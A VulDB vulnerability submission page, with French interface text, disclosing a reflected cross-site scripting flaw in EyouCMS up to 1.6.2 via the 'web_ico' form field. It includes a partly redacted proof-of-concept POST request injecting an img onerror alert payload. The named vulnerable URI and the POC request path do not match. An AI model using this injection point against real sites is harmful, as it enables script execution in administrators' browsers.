Soumettre #111320: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability information

Titreeyoucms up to 1.6.2 'web_ico' reflected xss vulnerability
Descriptioneyoucms up to 1.6.2 has a xss vulnerability The vulnerable uri is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4 and the vulnerable multipart parameter is name="web_ico" POC below: POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1 ***************************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy ******************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy Content-Disposition: form-data; name="web_ico" <img src=1 onerror=alert(8)> ------WebKitFormBoundaryq3khRwDr0dBifJAy ********************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy-- see details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md
La source⚠️ https://www.eyoucms.com/
Utilisateur
 WWesleywww (UID 43117)
Soumission07/04/2023 15:36 (il y a 3 ans)
Modérer14/04/2023 10:36 (7 days later)
StatutAccepté
Entrée VulDB225943 [EyouCms jusqu’à 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico cross site scripting]
Points17

PrécédentAperçuSuivant

Do you want to use VulDB in your project?

Use the official API to access entries easily!